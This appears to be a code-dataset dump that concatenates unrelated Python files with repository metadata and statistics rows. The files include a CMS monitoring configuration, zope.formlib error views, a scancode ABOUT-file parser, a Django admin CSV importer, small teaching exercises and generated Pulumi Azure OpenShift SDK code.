*process.DetachedTripletStep
*process.MixedTripletStep
*process.PixelLessStep
*process.TobTecStep
*process.generalTracks)
process.tracking_FirstStep = cms.Sequence(process.siPixelDigis
*process.siStripDigis
*process.trackerlocalreco
*process.offlineBeamSpot
*process.recopixelvertexing
*process.iterTracking)
process.p = cms.Path(process.scalersRawToDigi
*process.dqmTKStatus
*process.hltTriggerTypeFilter
*process.dqmcommon
*process.tracking_FirstStep
*process.offlinePrimaryVertices
*process.monitor)
#--------------------------------------------------
# Heavy Ion Stuff
#--------------------------------------------------
if (process.runType.getRunType() == process.runType.hi_run):
print "Running HI"
process.castorDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.csctfDigis.producer = cms.InputTag("rawDataRepacker")
process.dttfDigis.DTTF_FED_Source = cms.InputTag("rawDataRepacker")
process.ecalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.ecalPreshowerDigis.sourceTag = cms.InputTag("rawDataRepacker")
process.gctDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.gtDigis.DaqGtInputTag = cms.InputTag("rawDataRepacker")
process.gtEvmDigis.EvmGtInputTag = cms.InputTag("rawDataRepacker")
process.hcalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.muonCSCDigis.InputObjects = cms.InputTag("rawDataRepacker")
process.muonDTDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.muonRPCDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.scalersRawToDigi.scalersInputTag = cms.InputTag("rawDataRepacker")
#----------------------------
# Event Source
#-----------------------------
process.EventStreamHttpReader.SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring(
'HLT_HI*'
)
)
process.dqmBeamMonitor.OnlineMode = True ## in MC the LS are not ordered??
process.dqmBeamMonitor.resetEveryNLumi = 10
process.dqmBeamMonitor.resetPVEveryNLumi = 10
process.dqmBeamMonitor.BeamFitter.MinimumTotalLayers = 3 ## using pixel triplets
process.dqmBeamMonitor.PVFitter.minNrVerticesForFit = 20
process.dqmBeamMonitor.jetTrigger = cms.untracked.vstring("HLT_HI")
process.dqmBeamMonitor.hltResults = cms.InputTag("TriggerResults","","HLT")
## Load Heavy Ion Sequence
process.load("Configuration.StandardSequences.ReconstructionHeavyIons_cff") ## HI sequences
# Select events based on the pixel cluster multiplicity
import HLTrigger.special.hltPixelActivityFilter_cfi
process.multFilter = HLTrigger.special.hltPixelActivityFilter_cfi.hltPixelActivityFilter.clone(
inputTag = cms.InputTag('siPixelClusters'),
minClusters = cms.uint32(150),
maxClusters = cms.uint32(50000)
)
process.filter_step = cms.Sequence( process.siPixelDigis
*process.siPixelClusters
#*process.multFilter
)
process.HIRecoForDQM = cms.Sequence( process.siPixelDigis
*process.siPixelClusters
*process.siPixelRecHits
*process.offlineBeamSpot
*process.hiPixelVertices
*process.hiPixel3PrimTracks
)
# use HI pixel tracking and vertexing
process.dqmBeamMonitor.BeamFitter.TrackCollection = cms.untracked.InputTag('hiPixel3PrimTracks')
process.dqmBeamMonitorBx.BeamFitter.TrackCollection = cms.untracked.InputTag('hiPixel3PrimTracks')
process.dqmBeamMonitor.primaryVertex = cms.untracked.InputTag('hiSelectedVertex')
process.dqmBeamMonitor.PVFitter.VertexCollection = cms.untracked.InputTag('hiSelectedVertex')
# make pixel vertexing less sensitive to incorrect beamspot
process.hiPixel3ProtoTracks.RegionFactoryPSet.RegionPSet.originRadius = 0.2
process.hiPixel3ProtoTracks.RegionFactoryPSet.RegionPSet.fixedError = 0.5
process.hiSelectedProtoTracks.maxD0Significance = 100
process.hiPixelAdaptiveVertex.TkFilterParameters.maxD0Significance = 100
process.hiPixelAdaptiveVertex.vertexCollections.useBeamConstraint = False
#not working due to wrong tag of reco
process.hiPixelAdaptiveVertex.vertexCollections.maxDistanceToBeam = 1.0
process.p = cms.Path(process.scalersRawToDigi
*process.dqmTKStatus
*process.hltTriggerTypeFilter
*process.filter_step
*process.HIRecoForDQM
*process.dqmcommon
*process.monitor)
| 42.410156 | 127 | 0.644377 | 840 | 10,857 | 8.264286 | 0.333333 | 0.087727 | 0.062518 | 0.057044 | 0.300202 | 0.217228 | 0.198646 | 0.103717 | 0.103717 | 0.103717 | 0 | 0.007381 | 0.23874 | 10,857 | 255 | 128 | 42.576471 | 0.832547 | 0.122225 | 0 | 0.15894 | 0 | 0 | 0.16065 | 0.105341 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02649 | null | null | 0.013245 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4060cef76afd120f8b88cf8abb7104b1c967dfca | 2,614 | py | Python | src/zope/formlib/errors.py | zopefoundation/zope.formlib | af2d587a6eb24e59e95a8b1feb7aafc5d3b87ba4 | [
"ZPL-2.1"
] | 4 | 2018-05-09T04:16:25.000Z | 2021-03-05T17:27:21.000Z | src/zope/formlib/errors.py | zopefoundation/zope.formlib | af2d587a6eb24e59e95a8b1feb7aafc5d3b87ba4 | [
"ZPL-2.1"
] | 25 | 2016-03-24T15:23:08.000Z | 2021-03-05T16:53:53.000Z | src/zope/formlib/errors.py | zopefoundation/zope.formlib | af2d587a6eb24e59e95a8b1feb7aafc5d3b87ba4 | [
"ZPL-2.1"
] | 5 | 2015-02-11T13:32:06.000Z | 2018-05-09T04:16:26.000Z | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Error related things.
"""
try:
from html import escape
except ImportError: # pragma: NO COVER
from cgi import escape
from zope.component import adapter
from zope.interface import implementer
from zope.interface import Invalid
from zope.i18n import Message
from zope.i18n import translate
from zope.publisher.interfaces.browser import IBrowserRequest
from zope.publisher.browser import BrowserPage
from zope.formlib.interfaces import IWidgetInputErrorView
from zope.formlib.interfaces import IInvalidCSRFTokenError
@implementer(IWidgetInputErrorView)
@adapter(Invalid, IBrowserRequest)
class InvalidErrorView(object):
"""Display a validation error as a snippet of text."""
def __init__(self, context, request):
self.context = context
self.request = request
def snippet(self):
"""Convert a widget input error to an html snippet
>>> from zope.interface.exceptions import Invalid
>>> error = Invalid("You made an error!")
>>> InvalidErrorView(error, None).snippet()
u'<span class="error">You made an error!</span>'
"""
msg = self.context.args[0]
if isinstance(msg, Message):
msg = translate(msg, context=self.request)
return u'<span class="error">%s</span>' % escape(msg)
@adapter(IInvalidCSRFTokenError, IBrowserRequest)
class InvalidCSRFTokenErrorView(BrowserPage):
def update(self):
self.request.response.setStatus(403)
self.request.response.setHeader(
'Expires', 'Jan, 1 Jan 1970 00:00:00 GMT')
self.request.response.setHeader(
'Cache-Control', 'no-store, no-cache, must-revalidate')
self.request.response.setHeader(
'Pragma', 'no-cache')
def render(self):
msg = self.context.args[0]
if isinstance(msg, Message):
msg = translate(msg, context=self.request)
return escape(msg)
def __call__(self):
self.update()
return self.render()
| 34.394737 | 78 | 0.653405 | 298 | 2,614 | 5.704698 | 0.419463 | 0.047059 | 0.044706 | 0.049412 | 0.130588 | 0.094118 | 0.094118 | 0.094118 | 0.094118 | 0.094118 | 0 | 0.012387 | 0.197016 | 2,614 | 75 | 79 | 34.853333 | 0.797523 | 0.289594 | 0 | 0.214286 | 0 | 0 | 0.077159 | 0.014085 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119048 | false | 0 | 0.285714 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4061946ebfbadada4a68b023604bd5475c508749 | 6,090 | py | Python | src/packagedcode/about.py | sthagen/nexB-scancode-toolkit | 12cc1286df78af898fae76fa339da2bb50ad51b9 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | src/packagedcode/about.py | sthagen/nexB-scancode-toolkit | 12cc1286df78af898fae76fa339da2bb50ad51b9 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | src/packagedcode/about.py | sthagen/nexB-scancode-toolkit | 12cc1286df78af898fae76fa339da2bb50ad51b9 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | #
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import io
import os
from pathlib import Path
import saneyaml
from packagedcode import models
from packageurl import PackageURL
# TODO: Override get_package_resource so it returns the Resource that the ABOUT file is describing
TRACE = os.environ.get('SCANCODE_DEBUG_PACKAGE', False)
def logger_debug(*args):
pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
def logger_debug(*args):
return logger.debug(
' '.join(isinstance(a, str) and a or repr(a) for a in args)
)
class AboutFileHandler(models.DatafileHandler):
datasource_id = 'about_file'
default_package_type = 'about'
path_patterns = ('*.ABOUT',)
description = 'AboutCode ABOUT file'
documentation_url = 'https://aboutcode-toolkit.readthedocs.io/en/latest/specification.html'
@classmethod
def parse(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
with io.open(location, encoding='utf-8') as loc:
package_data = saneyaml.load(loc.read())
# About files can contain any purl and also have a namespace
about_type = package_data.get('type')
about_ns = package_data.get('namespace')
purl_type = None
purl_ns = None
        purl = package_data.get('purl')
        if purl:
            purl = PackageURL.from_string(purl)
            if purl:
                purl_type = purl.type
                purl_ns = purl.namespace
package_type = about_type or purl_type or cls.default_package_type
package_ns = about_ns or purl_ns
name = package_data.get('name')
version = package_data.get('version')
homepage_url = package_data.get('home_url') or package_data.get('homepage_url')
download_url = package_data.get('download_url')
copyright_statement = package_data.get('copyright')
license_expression = package_data.get('license_expression')
declared_license = license_expression
owner = package_data.get('owner')
if not isinstance(owner, str):
owner = repr(owner)
parties = [models.Party(type=models.party_person, name=owner, role='owner')]
# FIXME: also include notice_file and license_file(s) as file_references
file_references = []
about_resource = package_data.get('about_resource')
if about_resource:
file_references.append(models.FileReference(path=about_resource))
# FIXME: we should put the unprocessed attributes in extra data
yield models.PackageData(
datasource_id=cls.datasource_id,
type=package_type,
namespace=package_ns,
name=name,
version=version,
declared_license=declared_license,
license_expression=license_expression,
copyright=copyright_statement,
parties=parties,
homepage_url=homepage_url,
download_url=download_url,
file_references=file_references,
)
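    # Illustrative ABOUT file this parser accepts (keys as read above; values
    # are hypothetical):
    #   about_resource: this.tar.gz
    #   name: mypackage
    #   version: 1.0
    #   license_expression: apache-2.0
    #   owner: Jane Doe
    #   download_url: http://example.com/mypackage-1.0.tar.gz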
@classmethod
def assemble(cls, package_data, resource, codebase):
"""
Yield a Package. Note that ABOUT files do not carry dependencies.
"""
datafile_path = resource.path
# do we have enough to create a package?
if package_data.purl:
package = models.Package.from_package_data(
package_data=package_data,
datafile_path=datafile_path,
)
package_uid = package.package_uid
# NOTE: we do not attach files to the Package level. Instead we
# update `for_package` in the file
resource.for_packages.append(package_uid)
resource.save(codebase)
if not package.license_expression:
package.license_expression = cls.compute_normalized_license(package)
yield package
if resource.pid is not None and package_data.file_references:
parent_resource = resource.parent(codebase)
if parent_resource and package_data.file_references:
root_path = Path(parent_resource.path)
# FIXME: we should be able to get the path relatively to the
# ABOUT file resource a file ref extends from the root of
# the filesystem
file_references_by_path = {
str(root_path / ref.path): ref
for ref in package.file_references
}
for res in parent_resource.walk(codebase):
ref = file_references_by_path.get(res.path)
if not ref:
continue
# path is found and processed: remove it, so we can
# check if we found all of them
del file_references_by_path[res.path]
res.for_packages.append(package_uid)
res.save(codebase)
yield res
# if we have left over file references, add these to extra data
if file_references_by_path:
missing = sorted(file_references_by_path.values(), key=lambda r: r.path)
package.extra_data['missing_file_references'] = missing
else:
package.extra_data['missing_file_references'] = package_data.file_references[:]
# we yield this as we do not want this further processed
yield resource
| 36.25 | 98 | 0.621182 | 715 | 6,090 | 5.106294 | 0.296504 | 0.06327 | 0.046015 | 0.02739 | 0.050397 | 0.020268 | 0 | 0 | 0 | 0 | 0 | 0.001184 | 0.306732 | 6,090 | 167 | 99 | 36.467066 | 0.863572 | 0.209852 | 0 | 0.057143 | 0 | 0 | 0.0625 | 0.014358 | 0 | 0 | 0 | 0.017964 | 0 | 1 | 0.038095 | false | 0.009524 | 0.07619 | 0.009524 | 0.180952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4061e49b5b1d7dddbcbb3f8df2b62b73c065877a | 2,359 | py | Python | gazepattern/eyedetector/admin.py | AriRodriguezCruz/mcfgpr | c6f83f8e68bbab0054a7ea337feab276fc0790fc | [
"MIT"
] | null | null | null | gazepattern/eyedetector/admin.py | AriRodriguezCruz/mcfgpr | c6f83f8e68bbab0054a7ea337feab276fc0790fc | [
"MIT"
] | 12 | 2020-06-05T22:56:39.000Z | 2022-02-10T10:35:13.000Z | gazepattern/eyedetector/admin.py | AriRodriguezCruz/mcfgpr | c6f83f8e68bbab0054a7ea337feab276fc0790fc | [
"MIT"
] | 1 | 2019-10-06T23:40:45.000Z | 2019-10-06T23:40:45.000Z | # -*- coding: utf-8 -*-
#django
from django.contrib import admin
from django.db import transaction
#python
import csv
from decimal import Decimal
#gazepattern
from .models import Experiment, ExperimentPoint, Image, ImageRectangle, ExperimentPointCSV, ExperimentFunction
@transaction.atomic
def procesar(modeladmin, request, queryset):
for query in queryset:
file = query.file
with open(file.path) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
rows = [row for row in csv_reader if len(row)]
for row in rows:
experiment_id = int(row[0])
fixation_number = int(row[1])
x = Decimal(row[2])
y = Decimal(row[3])
experiment = Experiment.objects.get(pk=experiment_id)
experiment_point = ExperimentPoint()
experiment_point.experiment = experiment
experiment_point.fixation_number = fixation_number
experiment_point.x = x
experiment_point.y = y
experiment_point.save()
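# Expected CSV row layout (as parsed above): experiment_id,fixation_number,x,y
# e.g. "3,1,512.50,384.25"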
procesar.short_description = "Procesar CSV para generar experiments points"
class ExperimentPointCSVAdmin(admin.ModelAdmin):
list_display = ['id', 'file']
ordering = ['id']
actions = [procesar, ]
class ExperimentPointAdmin(admin.ModelAdmin):
list_display = ['id', 'experiment_id', 'fixation_number', 'x', 'y']
ordering = ['id']
search_fields = ["experiment__id"]
class ImageAdmin(admin.ModelAdmin):
list_display = ['id', 'name']
ordering = ['id']
class ExperimentAdmin(admin.ModelAdmin):
list_display = ['id', 'name', 'description']
ordering = ['id']
class ImageRectangleAdmin(admin.ModelAdmin):
list_display = ['id', 'image_id','name']
ordering = ['id']
search_fields = ['image__id']
class ExperimentFunctionAdmin(admin.ModelAdmin):
list_display = ['id', 'experiment_id', 'function']
ordering = ['id']
search_fields = ['experiment__id']
admin.site.register(ExperimentPointCSV, ExperimentPointCSVAdmin)
admin.site.register(ExperimentPoint, ExperimentPointAdmin)
admin.site.register(Image, ImageAdmin)
admin.site.register(Experiment, ExperimentAdmin)
admin.site.register(ImageRectangle, ImageRectangleAdmin)
admin.site.register(ExperimentFunction, ExperimentFunctionAdmin) | 31.878378 | 110 | 0.676982 | 245 | 2,359 | 6.37551 | 0.322449 | 0.046095 | 0.072983 | 0.099872 | 0.171575 | 0.135723 | 0.051216 | 0 | 0 | 0 | 0 | 0.00269 | 0.211954 | 2,359 | 74 | 111 | 31.878378 | 0.837547 | 0.018652 | 0 | 0.113208 | 0 | 0 | 0.083081 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018868 | false | 0 | 0.09434 | 0 | 0.528302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
406203c920d38242adfa5e5ed2a39070a52fd1c1 | 373 | py | Python | codigo/hexagonal/app/adapter/light_bulb_repository.py | VulturARG/charla_01 | 43a53fded4f3205a02b00993a523e2f94b79fc99 | [
"Apache-2.0"
] | null | null | null | codigo/hexagonal/app/adapter/light_bulb_repository.py | VulturARG/charla_01 | 43a53fded4f3205a02b00993a523e2f94b79fc99 | [
"Apache-2.0"
] | null | null | null | codigo/hexagonal/app/adapter/light_bulb_repository.py | VulturARG/charla_01 | 43a53fded4f3205a02b00993a523e2f94b79fc99 | [
"Apache-2.0"
] | null | null | null | from codigo.hexagonal.app.domain.switchable_repository import Switchable
class LightBulb(Switchable):
def turn_on(self) -> bool:
print("Connecting with the device...")
print("The light is on")
return True
def turn_off(self) -> bool:
print("The light is off")
print("Disconnecting with the device...")
return False
| 26.642857 | 72 | 0.646113 | 46 | 373 | 5.173913 | 0.586957 | 0.058824 | 0.109244 | 0.12605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.24933 | 373 | 13 | 73 | 28.692308 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.246649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.6 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4062ba894ee618c56f6c5822e3859495a6c3298f | 541 | py | Python | aula12/ex1.py | otaviobizulli/python-exercices | 2c61f014bf481fa463721b174ddd4238bf8d0cb3 | [
"MIT"
] | null | null | null | aula12/ex1.py | otaviobizulli/python-exercices | 2c61f014bf481fa463721b174ddd4238bf8d0cb3 | [
"MIT"
] | null | null | null | aula12/ex1.py | otaviobizulli/python-exercices | 2c61f014bf481fa463721b174ddd4238bf8d0cb3 | [
"MIT"
] | null | null | null | from random import randint
menor = 100  # smallest value found in the chosen row (all entries are <= 99)
linha = 0    # row index of the overall maximum
maior = 0    # overall maximum of the matrix
m = []
for i in range(10):
m.append([])
for j in range(10):
m[i].append(randint(1,99))
for i in range(10):
for j in range(10):
print(f'{m[i][j]:2}',end=' ')
print()
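# find the overall maximum and remember its row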
for i in range(10):
for j in range(10):
if m[i][j] > maior:
maior = m[i][j]
linha = i
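# the "minimax" is the smallest element of that row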
for i in range(10):
if m[linha][i] < menor:
menor = m[linha][i]
print(f'o minimax é {menor}, com o maior sendo {maior} na linha {linha+1}.')
| 16.393939 | 76 | 0.51756 | 97 | 541 | 2.886598 | 0.309278 | 0.175 | 0.225 | 0.157143 | 0.346429 | 0.185714 | 0.185714 | 0.185714 | 0.185714 | 0.185714 | 0 | 0.064343 | 0.310536 | 541 | 32 | 77 | 16.90625 | 0.686327 | 0 | 0 | 0.318182 | 0 | 0 | 0.145794 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0.136364 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4067cec9a6ceb8438c7e66edc2d29eb2148964ae | 1,323 | py | Python | sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | b70d505f9c3fef4a5f857fdccaa60b1b64c8a71d | [
"Apache-2.0"
] | 677 | 2016-01-04T04:05:50.000Z | 2022-03-24T06:37:27.000Z | sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | b70d505f9c3fef4a5f857fdccaa60b1b64c8a71d | [
"Apache-2.0"
] | 249 | 2015-12-29T03:41:31.000Z | 2020-09-02T03:11:30.000Z | sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | b70d505f9c3fef4a5f857fdccaa60b1b64c8a71d | [
"Apache-2.0"
] | 148 | 2015-12-29T03:25:48.000Z | 2021-08-25T03:59:52.000Z | #! /usr/bin/env python
from __future__ import print_function
import pandas as pd
import numpy as np
import argparse
def generate_csv(start_index, fname):
cols = [
str('A' + str(i)) for i in range(start_index, NUM_COLS + start_index)
]
data = []
for i in range(NUM_ROWS):
        vals = [np.random.choice(NUM_DISTINCT_VALS) for j in range(NUM_COLS)]
        data.append(vals)
df = pd.DataFrame(data=data, columns=cols)
df.to_csv(fname, index=False, header=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Generate sample tables to test joins.')
parser.add_argument('--num-rows', '-r', type=int, default=100)
parser.add_argument('--num-cols', '-c', type=int, required=True)
parser.add_argument('--num-distinct-vals', '-d', type=int, required=True)
parser.add_argument('--num-cols-overlap', '-o', type=int, default=1)
args = parser.parse_args()
NUM_ROWS = args.num_rows
NUM_COLS = args.num_cols
NUM_DISTINCT_VALS = args.num_distinct_vals
num_overlap = args.num_cols_overlap
if num_overlap > NUM_COLS:
print('--num-cols-overlap cannot be greater than --num-cols')
import sys
sys.exit(1)
generate_csv(0, 'table_a.csv')
generate_csv(NUM_COLS - num_overlap, 'table_b.csv')
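# Example invocation (counts are illustrative):
#   ./create_sample_table.py -c 5 -d 10 -o 2
# writes table_a.csv (columns A0..A4) and table_b.csv (A3..A7), sharing 2 columns.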
| 30.068182 | 77 | 0.670446 | 195 | 1,323 | 4.307692 | 0.4 | 0.091667 | 0.071429 | 0.095238 | 0.12619 | 0.092857 | 0.092857 | 0.092857 | 0 | 0 | 0 | 0.00565 | 0.197279 | 1,323 | 43 | 78 | 30.767442 | 0.785311 | 0.015873 | 0 | 0 | 1 | 0 | 0.142198 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.15625 | 0 | 0.1875 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
40686c4879d63aced85e26a35f076b9028592fdb | 24,660 | py | Python | sdk/python/pulumi_azure_native/containerservice/v20191027preview/open_shift_managed_cluster.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/containerservice/v20191027preview/open_shift_managed_cluster.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/containerservice/v20191027preview/open_shift_managed_cluster.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['OpenShiftManagedClusterArgs', 'OpenShiftManagedCluster']
@pulumi.input_type
class OpenShiftManagedClusterArgs:
def __init__(__self__, *,
open_shift_version: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
agent_pool_profiles: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]]] = None,
auth_profile: Optional[pulumi.Input['OpenShiftManagedClusterAuthProfileArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
master_pool_profile: Optional[pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs']] = None,
monitor_profile: Optional[pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs']] = None,
network_profile: Optional[pulumi.Input['NetworkProfileArgs']] = None,
plan: Optional[pulumi.Input['PurchasePlanArgs']] = None,
refresh_cluster: Optional[pulumi.Input[bool]] = None,
resource_name: Optional[pulumi.Input[str]] = None,
router_profiles: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a OpenShiftManagedCluster resource.
:param pulumi.Input[str] open_shift_version: Version of OpenShift specified when creating the cluster.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]] agent_pool_profiles: Configuration of OpenShift cluster VMs.
:param pulumi.Input['OpenShiftManagedClusterAuthProfileArgs'] auth_profile: Configures OpenShift authentication.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs'] master_pool_profile: Configuration for OpenShift master VMs.
:param pulumi.Input['OpenShiftManagedClusterMonitorProfileArgs'] monitor_profile: Configures Log Analytics integration.
:param pulumi.Input['NetworkProfileArgs'] network_profile: Configuration for OpenShift networking.
:param pulumi.Input['PurchasePlanArgs'] plan: Define the resource plan as required by ARM for billing purposes
:param pulumi.Input[bool] refresh_cluster: Allows node rotation
:param pulumi.Input[str] resource_name: The name of the OpenShift managed cluster resource.
:param pulumi.Input[Sequence[pulumi.Input['OpenShiftRouterProfileArgs']]] router_profiles: Configuration for OpenShift router(s).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
pulumi.set(__self__, "open_shift_version", open_shift_version)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if agent_pool_profiles is not None:
pulumi.set(__self__, "agent_pool_profiles", agent_pool_profiles)
if auth_profile is not None:
pulumi.set(__self__, "auth_profile", auth_profile)
if location is not None:
pulumi.set(__self__, "location", location)
if master_pool_profile is not None:
pulumi.set(__self__, "master_pool_profile", master_pool_profile)
if monitor_profile is not None:
pulumi.set(__self__, "monitor_profile", monitor_profile)
if network_profile is not None:
pulumi.set(__self__, "network_profile", network_profile)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if refresh_cluster is not None:
pulumi.set(__self__, "refresh_cluster", refresh_cluster)
if resource_name is not None:
pulumi.set(__self__, "resource_name", resource_name)
if router_profiles is not None:
pulumi.set(__self__, "router_profiles", router_profiles)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="openShiftVersion")
def open_shift_version(self) -> pulumi.Input[str]:
"""
Version of OpenShift specified when creating the cluster.
"""
return pulumi.get(self, "open_shift_version")
@open_shift_version.setter
def open_shift_version(self, value: pulumi.Input[str]):
pulumi.set(self, "open_shift_version", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="agentPoolProfiles")
def agent_pool_profiles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]]]:
"""
Configuration of OpenShift cluster VMs.
"""
return pulumi.get(self, "agent_pool_profiles")
@agent_pool_profiles.setter
def agent_pool_profiles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterAgentPoolProfileArgs']]]]):
pulumi.set(self, "agent_pool_profiles", value)
@property
@pulumi.getter(name="authProfile")
def auth_profile(self) -> Optional[pulumi.Input['OpenShiftManagedClusterAuthProfileArgs']]:
"""
Configures OpenShift authentication.
"""
return pulumi.get(self, "auth_profile")
@auth_profile.setter
def auth_profile(self, value: Optional[pulumi.Input['OpenShiftManagedClusterAuthProfileArgs']]):
pulumi.set(self, "auth_profile", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="masterPoolProfile")
def master_pool_profile(self) -> Optional[pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs']]:
"""
Configuration for OpenShift master VMs.
"""
return pulumi.get(self, "master_pool_profile")
@master_pool_profile.setter
def master_pool_profile(self, value: Optional[pulumi.Input['OpenShiftManagedClusterMasterPoolProfileArgs']]):
pulumi.set(self, "master_pool_profile", value)
@property
@pulumi.getter(name="monitorProfile")
